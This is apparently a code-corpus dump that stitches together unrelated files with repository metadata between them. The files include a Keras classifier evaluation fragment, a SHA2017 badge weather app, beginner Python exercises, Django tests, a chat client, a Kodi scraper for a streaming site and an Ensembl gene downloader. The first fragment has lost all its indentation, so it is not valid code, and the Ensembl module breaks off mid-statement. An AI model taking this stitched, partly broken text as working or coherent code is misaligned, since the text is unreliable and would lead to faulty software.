class_names = list(self.system_dict["dataset"]["params"]["classes"].keys());
for i in range(len(class_names)):
class_dict[class_names[i]] = {};
class_dict[class_names[i]]["num_images"] = 0;
class_dict[class_names[i]]["num_correct"] = 0;
step_size_test=self.system_dict["local"]["data_loaders"]["test"].n//self.system_dict["local"]["data_loaders"]["test"].batch_size
output = self.system_dict["local"]["model"].predict_generator(generator=self.system_dict["local"]["data_loaders"]["test"],
steps=step_size_test,
callbacks=None,
max_queue_size=10,
workers=psutil.cpu_count(),
use_multiprocessing=False,
verbose=verbose);
i = 0;
labels = self.system_dict["local"]["data_loaders"]["test"].labels;
for i in range(len(labels)):
gt = class_names[labels[i]];
l = class_names[np.argmax(output[i])];
class_dict[gt]["num_images"] += 1;
if(l==gt):
running_corrects += 1;
class_dict[gt]["num_correct"] += 1;
accuracy = running_corrects / len(self.system_dict["local"]["data_loaders"]['test'].labels);
self.custom_print("");
self.custom_print(" Result");
self.custom_print(" class based accuracies");
for i in range(len(class_names)):
self.custom_print(" {}. {} - {} %".format(i, class_names[i],
class_dict[class_names[i]]["num_correct"]/class_dict[class_names[i]]["num_images"]*100));
class_dict[class_names[i]]["accuracy(%)"] = class_dict[class_names[i]]["num_correct"]/class_dict[class_names[i]]["num_images"]*100;
self.custom_print(" total images: {}".format(len(self.system_dict["local"]["data_loaders"]["test"])));
self.custom_print(" num correct predictions: {}".format(running_corrects));
self.custom_print(" Average accuracy (%): {}".format(accuracy*100));
self.system_dict["testing"]["num_images"] = len(self.system_dict["local"]["data_loaders"]["test"]);
self.system_dict["testing"]["num_correct_predictions"] = running_corrects;
self.system_dict["testing"]["percentage_accuracy"] = accuracy*100;
self.system_dict["testing"]["class_accuracy"] = class_dict
self.system_dict["testing"]["status"] = True;
self.custom_print("");
return accuracy*100, class_dict;
###############################################################################################################################################
###############################################################################################################################################
@accepts("self", img_name=[str, bool], img_dir=[str, bool], return_raw=bool, post_trace=True)
@TraceFunction(trace_args=True, trace_rv=True)
def set_prediction_final(self, img_name=False, img_dir=False, return_raw=False):
self.custom_print("Prediction");
if(not self.system_dict["dataset"]["params"]["input_size"]):
msg = "Input Size not set for experiment.\n";
msg += "Tip: Use update_input_size";
raise ConstraintError(msg);
self.system_dict = set_transform_test(self.system_dict);
if(not self.system_dict["dataset"]["params"]["classes"]):
msg = "Class information unavailabe.\n";
msg += "Labels returned - Indexes instead of classes";
ConstraintWarning(msg);
if(img_name):
self.custom_print(" Image name: {}".format(img_name));
label, score, raw_output = process_single(img_name, return_raw, self.system_dict);
self.custom_print(" Predicted class: {}".format(label));
self.custom_print(" Predicted score: {}".format(score));
tmp = {};
tmp["img_name"] = img_name;
tmp["predicted_class"] = label;
tmp["score"] = score;
if(return_raw):
tmp["raw"] = raw_output;
self.custom_print("");
return tmp;
if(img_dir):
output = [];
self.custom_print(" Dir path: {}".format(img_dir));
img_list = os.listdir(img_dir);
self.custom_print(" Total Images: {}".format(len(img_list)));
self.custom_print("Processing Images");
if(self.system_dict["verbose"]):
pbar = tqdm(total=len(img_list));
for i in range(len(img_list)):
if(self.system_dict["verbose"]):
pbar.update();
img_name = img_dir + "/" + img_list[i];
label, score, raw_output = process_single(img_name, return_raw, self.system_dict);
tmp = {};
tmp["img_name"] = img_list[i];
tmp["predicted_class"] = label;
tmp["score"] = score;
if(return_raw):
tmp["raw"] = raw_output;
output.append(tmp);
self.custom_print("");
return output
###############################################################################################################################################
|
[
"abhishek4273@gmail.com"
] |
abhishek4273@gmail.com
|
92d45f0567a686cb57d652d6ccaf23ffcd01a779
|
8d169bd14e4b4afaf27de87b62c2608e967b86c9
|
/service.py
|
dd3d70fa82e873c7fa5c497e9d3870dab1681c3f
|
[
"Unlicense"
] |
permissive
|
floort/buienbadge
|
72fcc7a9a488240a6189aa6bc7a9438bdb54f3e7
|
178a090970e69891b3381a8d158b06d1b611c147
|
refs/heads/master
| 2021-06-20T08:34:34.982594
| 2017-08-05T20:23:56
| 2017-08-05T20:23:56
| 99,443,591
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,263
|
py
|
import urequests
import ugfx
import network
import badge
import time
def setup():
pass
def loop():
    sta_if = network.WLAN(network.STA_IF); sta_if.active(True) # Activate the station interface
sta_if.scan() # Scan for available access points
sta_if.connect("SHA2017-insecure") # Connect to the public SHA2017 AP without a password
sta_if.isconnected() # Check for successful connection
sta_if.ifconfig() # Print connection information
r = urequests.get('https://br-gpsgadget-new.azurewebsites.net/data/raintext/?lat=52.28&lon=5.52')
lines = r.text.splitlines()
raindata = [int(lines[i].split('|')[0]) for i in range(len(lines))]
if sum(raindata) > 0:
# Plot graph
ugfx.clear(ugfx.WHITE)
for i in range(len(raindata)):
ugfx.area(12*i,127-(raindata[i]//2), 11, 127, ugfx.BLACK)
ugfx.flush()
badge.leds_init()
badge.leds_send_data(bytes([0, 0, raindata[0]//2, 0]*6) ,24) # all blue with intensity of current rain
badge.vibrator_init()
badge.vibrator_activate(9)
time.sleep(2)
badge.leds_disable()
return 15*60*1000
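# Editor's note (sketch, not part of the original badge app): each line of the
# buienradar raintext feed has the form "<intensity>|<HH:MM>", e.g. "077|21:30",
# so the comprehension above keeps only the integer intensity; a hypothetical
# two-line response "000|21:30\n100|21:35" would parse to raindata == [0, 100].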
|
[
"noreply@github.com"
] |
floort.noreply@github.com
|
9992ff9aee45ed02003d5ce75e3b546b9fbcc500
|
80e6d8be1918fdd3f1f73d356daa5d4252913861
|
/6.If Statement & Assignment.py
|
599eaebb53c17e2b08211eac8f24265184dc188b
|
[] |
no_license
|
koolhussain/Python-Basics
|
0bf539d2caaf16259e9734b5969fb8762389c905
|
26c3707197f829927a143601a9e3e6da89178291
|
refs/heads/master
| 2021-09-09T11:20:03.156611
| 2018-03-15T14:41:37
| 2018-03-15T14:41:37
| 115,584,306
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 612
|
py
|
x = 5
y = 8
z = 5
a = 3
#if example
if x < y:
print('X is lesser than y')
if z < y > x:
    print('Y is greater than Z & X')
if z < y > x > a:
    print('Y is greater than Z & X')
if z <= x:
    print('z is less than or equal to x')
#if else example
if x > y:
print('X is greater than y')
else:
print('Y is Greater than X')
#elif examples
x = 5
y = 10
z = 22
# if a condition is true, the conditions below it
# are not checked even if they are true
if x > y:
print('x > y')
elif x < z:
print('x < z')
elif 5 > 2:
print('5 > 2')
else:
print('if and elif never ran')
|
[
"ahmad.hussain91@gmail.com"
] |
ahmad.hussain91@gmail.com
|
10e0407756b06e0e3a967eecaf43c67bfe4aa87b
|
f4e8d97d93e05430b4927427363ef47e692dade2
|
/ex30.py
|
11fb5c2b1dc63c2108e4d35cc5f94a6d01979840
|
[] |
no_license
|
MsJayMorris/learnpythonthehardway
|
6fa91f917e6c87fb8617161e9f4d61750579a2ca
|
f56a62bd3a51b12ff065c26b3b2adefa33593a44
|
refs/heads/master
| 2021-01-10T16:30:08.162781
| 2016-01-30T10:49:15
| 2016-01-30T10:49:15
| 48,209,590
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 512
|
py
|
people = 30
cars = 40
trucks = 15
if cars > people or trucks > cars:
print "We should take the cars."
elif cars < people:
print "We should not take the cars."
else:
print "We can't decide."
if trucks > cars and people < trucks:
print "That's too many trucks."
elif trucks < cars:
print "Maybe we could take the trucks."
else:
print "We stil can't decide."
if people > trucks:
print "Alright, let's just take the trucks."
else:
print "Fine, let's stay home then."
|
[
"msjaymorris@gmail.com"
] |
msjaymorris@gmail.com
|
a7c6f21ec1846551beda5168398d4af1642175d1
|
a1b69bbf742a4a4e7b6f166b20e7b5ab3c060b57
|
/playground/binary_file.py
|
677b04267c9c7cf48af553063d561722b2124331
|
[
"MIT"
] |
permissive
|
dpm76/uPyFlasher
|
8970af362652ef23124a62ea385e4ff22946849c
|
bd37d891af985c11e22f210789c33394460a0e4d
|
refs/heads/master
| 2021-06-01T22:33:52.803930
| 2020-07-27T14:42:02
| 2020-07-27T14:42:02
| 140,459,032
| 2
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 490
|
py
|
def printBinaryFile(path):
'''
Shows a binary file.
This function is intended to show a binary file uploaded to the MCU
@param path: path to the file
'''
with open(path, "rb") as f:
buffer = bytes(f.read(16))
while len(buffer) > 0:
line = ""
for byte in buffer:
line += "{0:02x} ".format(byte)
print(line)
buffer = bytes(f.read(16))
f.close()
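# Minimal usage sketch (editor's addition; the path below is hypothetical and not
# part of this module):
if __name__ == "__main__":
    # Dumps the file 16 bytes per row, each byte printed as two hex digits.
    printBinaryFile("/flash/firmware.bin")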
|
[
"info@davidpm.eu"
] |
info@davidpm.eu
|
35f4e105582a5c17c9b15220071ef8798cb57d94
|
3ea720fde9aca2d71c34148bf9cec2082d4b32f6
|
/people/tests/unit/models/test_performer.py
|
619297920f732e651982c085cfd962d2030c5a4f
|
[] |
no_license
|
aqsmallwood/symphony-hall-backend
|
54d9905c6ea65ab5fc35e18beddaeef8e1337d82
|
fabdd9ca9e58a3bb4cdd2f41dc4d398c9e30ffe8
|
refs/heads/master
| 2022-06-17T06:01:13.509769
| 2020-02-28T05:37:08
| 2020-02-28T05:37:08
| 242,221,355
| 0
| 0
| null | 2022-05-25T04:18:21
| 2020-02-21T20:06:07
|
Python
|
UTF-8
|
Python
| false
| false
| 407
|
py
|
from people.models import Performer
def test_performer_has_necessary_fields():
performer = Performer()
assert True == hasattr(performer, 'id')
assert True == hasattr(performer, 'name')
def test_performer_has_meaningful_string_representation():
test_performer_name = 'Fiddling Fiddler'
performer = Performer(name=test_performer_name)
assert test_performer_name == str(performer)
|
[
"smallwoodadrian54@gmail.com"
] |
smallwoodadrian54@gmail.com
|
a26d9ab41dd1583a3474ec17749f3c2df866c269
|
3793d07a972c24f6bca9456b144b7415608d1e30
|
/movieDatabase-master/movies/migrations/0010_movie_has_tag_t_id.py
|
58aa82d13e4cc4f70102e09f8f2a685631eb855f
|
[] |
no_license
|
lucianHymer/movieDatabase
|
31591a0d939d158ef7c63937ffcfbbb3e7128077
|
7f5ad2541a21c0d1b7b7aec7fde13f9c1048b7ea
|
refs/heads/master
| 2021-01-19T09:15:45.556242
| 2017-08-24T21:48:44
| 2017-08-24T21:48:44
| 87,745,263
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 407
|
py
|
# Generated by Django 2.0.dev20170322162159 on 2017-04-06 18:33
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('movies', '0009_movie_has_tag'),
]
operations = [
migrations.AddField(
model_name='movie_has_tag',
name='t_id',
field=models.ManyToManyField(to='movies.Tag'),
),
]
|
[
"mdng223@g.uky.edu"
] |
mdng223@g.uky.edu
|
49473eb66d8de28c289682d058fe5aabf9e6059a
|
256faeac3766bdcb563d85af95902ed8bce40cf0
|
/sets-discard,pop,delete-operations.py
|
a71b3ddc8caf8f6ae02576e58e186eb97b250aec
|
[] |
no_license
|
Harini-sakthivel/PYTHON-Hands-on-coding-
|
2285863edbebcccd4770616549c111b7bafaa913
|
c54e64ea9e51ea6629c3311a613a3d23bacb4ccc
|
refs/heads/master
| 2021-07-12T04:06:17.716157
| 2019-08-18T09:30:19
| 2019-08-18T09:30:19
| 202,975,946
| 4
| 1
| null | 2020-10-03T14:21:14
| 2019-08-18T07:59:05
|
Python
|
UTF-8
|
Python
| false
| false
| 1,087
|
py
|
'''
.remove(x)
>>> s = set([1, 2, 3, 4, 5, 6, 7, 8, 9])
>>> s.remove(5)
>>> print s
set([1, 2, 3, 4, 6, 7, 8, 9])
>>> print s.remove(4)
None
>>> print s
set([1, 2, 3, 6, 7, 8, 9])
>>> s.remove(0)
KeyError: 0
.discard(x)
>>> s = set([1, 2, 3, 4, 5, 6, 7, 8, 9])
>>> s.discard(5)
>>> print s
set([1, 2, 3, 4, 6, 7, 8, 9])
>>> print s.discard(4)
None
>>> print s
set([1, 2, 3, 6, 7, 8, 9])
>>> s.discard(0)
>>> print s
set([1, 2, 3, 6, 7, 8, 9])
.pop()
>>> s = set([1])
>>> print s.pop()
1
>>> print s
set([])
>>> print s.pop()
KeyError: pop from an empty set
input:
9
1 2 3 4 5 6 7 8 9
10
pop
remove 9
discard 9
discard 8
remove 7
pop
discard 6
remove 5
pop
discard 5
output:
{2, 3, 4, 5, 6, 7, 8, 9}
{2, 3, 4, 5, 6, 7, 8}
{2, 3, 4, 5, 6, 7, 8}
{2, 3, 4, 5, 6, 7}
{2, 3, 4, 5, 6}
{3, 4, 5, 6}
{3, 4, 5}
{3, 4}
{4}
4
'''
n = int(input())
s = set(map(int, input().split()))
methods = {
'pop' : s.pop,
'remove' : s.remove,
'discard' : s.discard
}
for _ in range(int(input())):
method, *args = input().split()
methods[method](*map(int,args))
print(sum(s))
print(s)
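# Editor's note (sketch, not part of the original submission): the dispatch dict above
# lets every command share one call site. For the sample session in the docstring,
# "pop" arrives with no arguments, so *map(int, args) expands to nothing and s.pop()
# is called, while "remove 9" expands to s.remove(9) and "discard 8" to s.discard(8).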
|
[
"noreply@github.com"
] |
Harini-sakthivel.noreply@github.com
|
83f4c71b012c11784749714418397eef3ae1f6ca
|
be4d3de3a08164b2ae7c92442be10a560a7dc119
|
/client.py
|
f99f99c357ef828926571c35ef42a4c0e45f88e4
|
[] |
no_license
|
magnuscodex/chat
|
b8db014db2cee598b487736dfb75bdcfbfee6170
|
29edd4b878959c4c37f3d5347f087bc0b4161ca2
|
refs/heads/master
| 2021-01-10T19:50:42.564533
| 2014-01-17T07:15:18
| 2014-01-17T07:15:18
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 835
|
py
|
#!/usr/bin/env python
import socket
import sys
import signal
from select import select
TCP_PORT = 4675
BUFF_SIZE = 1024
TIMEOUT = 1
def sig_handler(sig, frame):
print "Exiting"
#TODO make socket global and close it
exit(0)
signal.signal(signal.SIGINT, sig_handler)
host = raw_input("server name:")
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, TCP_PORT))
while True:
#First send input, if any
rlist, _, _ = select([sys.stdin], [], [], TIMEOUT)
if rlist:
msg = sys.stdin.readline()
s.send(msg)
#Second, print all messages received
received = True
while received:
rlist, _, _ = select([s], [], [], TIMEOUT)
if rlist:
data = s.recv(BUFF_SIZE)
if not data:
s.close()
exit(0)
print data,
else:
received = False
s.close()
|
[
"magnuscodex@gmail.com"
] |
magnuscodex@gmail.com
|
bc5075b856cd517a73420eef0f7cffb2dc993082
|
55dc9c7d7fb03aba894c15e2b7ed06e89b522da9
|
/predict.py
|
c7d4d5df5e25fd61422252d1242a73e9fece4bf8
|
[] |
no_license
|
HotVector/Face-Authentication
|
6e7636077d9a104d624ad776428f6b9a19cd9f4a
|
5e67f88d2b85051318551d7d3102f3589611bd38
|
refs/heads/master
| 2021-01-24T03:30:29.850038
| 2018-04-22T14:27:41
| 2018-04-22T14:27:41
| 122,895,403
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 378
|
py
|
import tensorflow as tf
import cv2
class FacePredict(object):
def faceCompare(self, faces):
#print("Begin Compare.")
gray = cv2.cvtColor(faces[0], cv2.COLOR_BGR2GRAY)
###for idx, i in enumerate(faces):
### windowName = "Face - " + str(idx)
### cv2.imshow(windowName, i)
        # TODO: use this photo to run the prediction
|
[
"veerendra2002@gmail.com"
] |
veerendra2002@gmail.com
|
89249622c56fe5943c302eea7bb7045414687ae1
|
aa79f29196a90788a6d47fdaae39ac6c5ce2a710
|
/backend/profiles/admin.py
|
5aa08fe30ddf921ed9f96b1b7ccd22d783e7c6a1
|
[] |
no_license
|
MutwiriFrank/twitter_clone
|
5c4bb902dfbeef9793da9bb0b9bd0713e6f712cb
|
718dbb4f4ae3da968f67f8efe2bb53411e8dc1f5
|
refs/heads/master
| 2023-06-22T10:12:44.780344
| 2021-07-24T09:20:32
| 2021-07-24T09:20:32
| 389,051,013
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 221
|
py
|
from django.contrib import admin
from .models import Profile, FollowerRelation, Skills, Review
admin.site.register(Profile)
admin.site.register(Skills)
admin.site.register(FollowerRelation)
admin.site.register(Review)
|
[
"mutwirifranco@gmail.com"
] |
mutwirifranco@gmail.com
|
b3d3ff47eb93e30ac5afeb9d6c86f0b632d925a7
|
4e9aa9c6e3d6a12a5cd0a2332a1a8ef8124045bf
|
/plugin.video.salts/scrapers/2movies_scraper.py
|
e3b7496fd09580e9950f6ab0b254e0f59983471d
|
[] |
no_license
|
Oggie101/tknorris-beta-repo
|
53354005c089b80e09067f412c4c701561826988
|
5e7aa01fea46b31c0df7b69012fb1473221e2469
|
refs/heads/master
| 2021-01-18T00:31:24.679958
| 2015-10-14T19:16:23
| 2015-10-14T19:16:23
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,722
|
py
|
"""
SALTS XBMC Addon
Copyright (C) 2014 tknorris
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
"""
import scraper
import urlparse
import re
import time
from salts_lib import kodi
from salts_lib import log_utils
from salts_lib.constants import VIDEO_TYPES
from salts_lib.constants import QUALITIES
from salts_lib.constants import XHR
BASE_URL = 'http://twomovies.us'
AJAX_URL = '/Xajax/ajaxifyy/'
class TwoMovies_Scraper(scraper.Scraper):
base_url = BASE_URL
def __init__(self, timeout=scraper.DEFAULT_TIMEOUT):
self.timeout = timeout
self.base_url = kodi.get_setting('%s-base_url' % (self.get_name()))
@classmethod
def provides(cls):
return frozenset([VIDEO_TYPES.TVSHOW, VIDEO_TYPES.EPISODE, VIDEO_TYPES.MOVIE])
@classmethod
def get_name(cls):
return '2movies'
def resolve_link(self, link):
url = urlparse.urljoin(self.base_url, link)
html = self._http_get(url, cookies={'links_tos': '1'}, cache_limit=0)
match = re.search('<iframe[^<]+src=(?:"|\')([^"\']+)', html, re.DOTALL | re.I)
if match:
return match.group(1)
else:
match = re.search('href="[^"]*/go_away/\?go=([^"]+)', html)
if match:
return match.group(1)
def format_source_label(self, item):
return '[%s] %s' % (item['quality'], item['host'])
def get_sources(self, video):
sources = []
source_url = self.get_url(video)
if source_url:
url = urlparse.urljoin(self.base_url, source_url)
html = self._http_get(url, cache_limit=1)
pattern = 'class="playDiv3".*?href="([^"]+).*?>(.*?)</a>'
for match in re.finditer(pattern, html, re.DOTALL | re.I):
url, host = match.groups()
source = {'multi-part': False, 'url': url.replace(self.base_url, ''), 'host': host, 'class': self, 'quality': self._get_quality(video, host, QUALITIES.HIGH), 'rating': None, 'views': None, 'direct': False}
sources.append(source)
return sources
def get_url(self, video):
return super(TwoMovies_Scraper, self)._default_get_url(video)
def search(self, video_type, title, year):
results = []
search_url = urlparse.urljoin(self.base_url, AJAX_URL)
xjxr = str(int(time.time() * 1000))
search_arg = 'S<![CDATA[%s]]>' % (title)
data = {'xjxfun': 'search_suggest', 'xjxr': xjxr, 'xjxargs[]': [search_arg, 'Stitle']}
html = self._http_get(search_url, data=data, headers=XHR, cache_limit=0)
if video_type == VIDEO_TYPES.MOVIE:
marker = '/watch_movie/'
else:
marker = '/watch_tv_show/'
for match in re.finditer('href="([^"]+)[^>]+>(.*?)</div>', html):
url, match_title_year = match.groups()
if marker not in url: continue
match_title_year = re.sub('(<b>|</b>)', '', match_title_year)
match = re.search('(.*?)\s+\(?(\d{4})\)?', match_title_year)
if match:
match_title, match_year = match.groups()
else:
match_title = match_title_year
match_year = ''
if not year or not match_year or year == match_year:
result = {'url': url.replace(self.base_url, ''), 'title': match_title, 'year': match_year}
results.append(result)
return results
def _get_episode_url(self, show_url, video):
episode_pattern = 'class="linkname\d*" href="([^"]+/watch_episode/[^/]+/%s/%s/)"' % (video.season, video.episode)
title_pattern = 'class="linkname"\s+href="([^"]+)">Episode_\d+\s+-\s+([^<]+)'
return super(TwoMovies_Scraper, self)._default_get_episode_url(show_url, video, episode_pattern, title_pattern)
def _http_get(self, url, cookies=None, data=None, headers=None, cache_limit=8):
return super(TwoMovies_Scraper, self)._cached_http_get(url, self.base_url, self.timeout, cookies=cookies, data=data, headers=headers, cache_limit=cache_limit)
|
[
"tknorris@gmail.com"
] |
tknorris@gmail.com
|
77a6931ad430cd0530157aacb5dc04b0e9ae289b
|
04d821121ccf79fe3935ce542e039f31b5997e42
|
/microservice/drone_ifood/apps.py
|
f60235fa89ee96d818c74fdf3b9d4b4c8b60a3f0
|
[] |
no_license
|
jcpribeiro/Atividade_FIAP
|
d351f0e5c93d4e46db6957126d73040121ec7f2f
|
3bcaeaa63bd0c8b3bd4f1b5b8ad103515f37e449
|
refs/heads/main
| 2023-08-21T05:01:58.020745
| 2021-09-30T22:54:58
| 2021-09-30T22:54:58
| 411,798,962
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 153
|
py
|
from django.apps import AppConfig
class DroneIfoodConfig(AppConfig):
default_auto_field = 'django.db.models.BigAutoField'
name = 'drone_ifood'
|
[
"42126757+jcpribeiro@users.noreply.github.com"
] |
42126757+jcpribeiro@users.noreply.github.com
|
b9b8310451c9429b1ccaa0e257eb72aa6c00031d
|
401069e7f0e8a865c6c18bc9ca0f2cbcc8cba6b2
|
/ensembl_gene/ensembl_gene.py
|
4a2adb872ed8cc81ecb2b426518bd565e29c75f7
|
[] |
no_license
|
wul0228/mydb_v1
|
e48981d18dac6f88acdc84cdc0b2c3c7a5d244c9
|
66a2cc681ef4670161e68a6cfc5447b126dba46c
|
refs/heads/master
| 2021-09-06T23:01:12.202023
| 2018-02-13T03:37:04
| 2018-02-13T03:37:04
| 115,709,752
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 14,173
|
py
|
#!/usr/bin/env python
# -*- coding:utf-8 -*-
# date: 2017/11/28
# author:wuling
# emai:ling.wu@myhealthygene.com
# this module is used to download, extract, standardize, insert and select gene data from Ensembl
import sys
sys.path.append('../')
reload(sys)  # reload is needed before setdefaultencoding is available in Python 2
sys.setdefaultencoding('utf-8')
from share import *
from config import *
__all__ = ['downloadData','extractData','standarData','insertData','updateData','selectData']
version = 1.0
model_name = psplit(os.path.abspath(__file__))[1]
(ensembl_gene_model,ensembl_gene_raw,ensembl_gene_store,ensembl_gene_db,ensembl_gene_map) = buildSubDir('ensembl_gene')
log_path = pjoin(ensembl_gene_model,'ensembl_gene.log')
# main code
def downloadData(redownload = False):
'''
this function is to download the raw data from ensembl gene FTP WebSite
args:
redownload-- default False, check to see if exists an old edition before download
-- if set to true, download directly with no check
'''
if not redownload:
(choice,existensemblFile) = lookforExisted(ensembl_gene_raw,'gene')
if choice != 'y':
return
if redownload or not existensemblFile or choice == 'y':
rawdir = pjoin(ensembl_gene_raw,'gene_{}'.format(today))
createDir(rawdir)
process = parse(today)
#-----------------------------------------------------------------------------------------------------------------
# download gtfGRch38 file
ensembl_gene_ftp_infos['logdir'] = ensembl_gtfGRch38_ftp_path
process.getOne(ensembl_gene_ftp_infos,filename_gtfGRch38,rawdir)
# # download regulatorGRch38 files
# ensembl_gene_ftp_infos['logdir'] = ensembl_regulatorGRch38_ftp_path
# func = lambda x:downloadOne(ensembl_gene_ftp_infos,x,rawdir)
# multiProcess(func,filenames_regulatorGRch38,size=16)
#-----------------------------------------------------------------------------------------------------------------
# download gtfGRch37 file
ensembl_gene_ftp_infos['logdir'] = ensembl_gtfGRch37_ftp_path
downloadOne(ensembl_gene_ftp_infos,filename_gtfGRch37,rawdir)
# # download regulatorGRch37 files
# ensembl_gene_ftp_infos['logdir'] = ensembl_regulatorGRch37_ftp_path
# func = lambda x:downloadOne(ensembl_gene_ftp_infos,x,rawdir)
# multiProcess(func,filenames_regulatorGRch37,size=16)
#-----------------------------------------------------------------------------------------------------------------
# generate a log file in current path
if not os.path.exists(log_path):
initLogFile('ensembl_gene',model_name,ensembl_gene_model,rawdir=rawdir)
#-----------------------------------------------------------------------------------------------------------------
# create every version files included
update_file_heads =dict()
for filename in listdir(rawdir):
head = filename.split('_213')[0].strip()
if head.count('.chr.gtf'):
head = head.split('.chr.gtf')[0].rsplit('.',1)[0] + '.chr.gtf'
update_file_heads[head] = pjoin(rawdir,filename)
with open(pjoin(ensembl_gene_db,'gene_{}.files'.format(today)),'w') as wf:
json.dump(update_file_heads,wf,indent=2)
        print 'data download completed!'
#-----------------------------------------------------------------------------------------------------------------
# generate filepaths to next step extractData
        filepaths = [pjoin(rawdir,filename) for filename in listdir(rawdir)]
return (filepaths,today)
def extractData(filepaths,date):
'''
this function is set to distribute all filepath to parser to process
args:
filepaths -- all filepaths to be parserd
date -- the date of data download
'''
# 1. distribute filepaths for parser
gene_transcript_paths = [path for path in filepaths if psplit(path)[1].strip().count('chr.gtf') ]
# 2. parser filepaths step by step
process = parser(date)
# --------------------------------ensembl.gene.transcript-------------------------------------------------------------------------
process.gene_transcript(gene_transcript_paths)
print 'extract and insert complete '
# -------------------------------------------------------------------------------------------------------------------------------------------
# 3. bkup all collections
colhead = 'ensembl.gene'
bkup_allCols('mydb_v1',colhead,ensembl_gene_db)
return (filepaths,date)
def updateData(insert=True):
'''
this function is set to update all file in log
'''
ensembl_gene_log = json.load(open(log_path))
updated_rawdir = pjoin(ensembl_gene_raw,'gene_{}'.format(today))
# -------------------------------------------------------------------------------------------------------------------------------------------
new = False
for file,ftpsite in ensembl_file_ftplogdir.items():
ftp_infos = copy.deepcopy(ensembl_gene_ftp_infos)
ftp_infos['logdir'] = ftpsite
ftp = connectFTP(**ftp_infos)
filenames = ftp.nlst()
for filename in filenames:
if filename.count(ensembl_file_mark.get(file)):
mt = ftp.sendcmd('MDTM {}'.format(filename))
if mt != ensembl_gene_log.get(file)[-1][0]:
new = True
createDir(updated_rawdir)
downloadOne(ftp_infos,filename,updated_rawdir)
ensembl_gene_log[file].append((mt,today,model_name))
print '{} \'s new edition is {} '.format(filename,mt)
else:
print '{} {} is the latest !'.format(filename,mt)
if new:
with open(log_path,'w') as wf:
json.dump(ensembl_gene_log,wf,indent=2)
(latest_filepaths,version) = createNewVersion(ensembl_gene_raw,ensembl_gene_db,updated_rawdir,'gene_',today)
if insert:
extractData(latest_filepaths.values(),version)
return 'update successfully'
else:
return 'new version is\'t detected'
def selectData(querykey = 'gene_id',value='ENSG00000243485'):
'''
this function is set to select data from mongodb
args:
querykey -- a specified field in database
queryvalue -- a specified value for a specified field in database
'''
conn = MongoClient('127.0.0.1', 27017 )
db = conn.get_database('mydb_v1')
colnamehead = 'ensembl'
dataFromDB(db,colnamehead,querykey,queryvalue=None)
class parser(object):
"""docstring for parser"""
def __init__(self,date):
self.date = date
conn = MongoClient('localhost',27017)
db = conn.get_database('mydb_v1')
self.db = db
def getOne(self,ensembl_gene_ftp_infos,filename,rawdir):
'''
this function is to download one file under a given remote dir
args:
ftp -- a ftp cursor for a specified
filename -- the name of file need download
rawdir -- the directory to save download file
'''
while True:
try:
ftp = connectFTP(**ensembl_gene_ftp_infos)
mt = ftp.sendcmd('MDTM {}'.format(filename))
savefilename = '{}_{}_{}.gz'.format(filename.rsplit('.',1)[0].strip(),mt,today).replace(' ','')
remoteabsfilepath = pjoin(ensembl_gene_ftp_infos['logdir'],'{}'.format(filename))
print filename,'start'
save_file_path = ftpDownload(ftp,filename,savefilename,rawdir,remoteabsfilepath)
print filename,'done'
return (save_file_path,mt)
except:
ftp = connectFTP(**ensembl_gene_ftp_infos)
def gene_transcript(self,filepaths):
colname = 'ensembl.gene.transcript'
# before insert ,truncate collection
delCol('mydb_v1',colname)
col = self.db.get_collection(colname)
col.ensure_index([('transcript_id',1),])
for filepath in filepaths:
filename = psplit(filepath)[1].strip()
fileversion = filename.rsplit('_',1)[0].strip().rsplit('_',1)[1].strip()
if not col.find_one({'dataVersion':fileversion}):
col.insert({'dataVersion':fileversion,'dataDate':self.date,'colCreated':today,'file':'Homo_sapiens.GRCh?.?.chr.gtf'})
#-----------------------------------------------------------------------------------------------------------------------
# gunzip file
if filename.endswith('.gz'):
command = 'gunzip {}'.format(filepath)
os.popen(command)
filepath = filepath.rsplit('.gz',1)[0].strip()
#-----------------------------------------------------------------------------------------------------------------------
grch = filename.split('_sapiens.')[1].split('_213')[0].strip().split('.',1)[0]
file = open(filepath)
n = 0
gene_info = dict()
assembly = 'ensembl_{}'.format(grch)
for line in file:
if line.startswith('#'):
continue
# the front of line ,delimited by tab and have no key, and the latter delimited by ; with the format key space value("")
front_keys = ['chr','data_source','entry','start','end','score','strand','fields']
front = line.split('gene_id')[0].strip().split('\t')
front_dic = dict([(key,val) for key,val in zip(front_keys,front)])
# transform the string to int in start and end
front_dic['start' ] = int(front_dic['start' ])
front_dic['end' ] = int(front_dic['end' ])
latter = [i.strip() for i in line.strip().split('gene_id')[1].strip().split(';') if i ]
latter_dic = dict([(i.split(' ')[0],i.split(' ')[1].replace('"','')) for i in latter[1:] ])
gene_id = latter[0].replace('"','')
entry = front_dic.get('entry')
if entry == 'gene':
latter_dic['gene_id'] = gene_id
latter_dic.update(front_dic)
for key in ['data_source','entry','score','fields']:
latter_dic.pop(key)
latter_dic['assembly'] = assembly
gene_info[gene_id] = latter_dic
elif entry == 'transcript':
latter_dic['transcript_start'] = front_dic.get('start')
latter_dic['transcript_end'] = front_dic.get('end')
for key in latter_dic.keys():
if key.startswith('gene'):
latter_dic.pop(key)
latter_dic.update(gene_info.get(gene_id))
col.insert(latter_dic)
elif entry in ['Selenocysteine','five_prime_utr','three_prime_utr']:
transcript_id = latter_dic.get('transcript_id')
col.update(
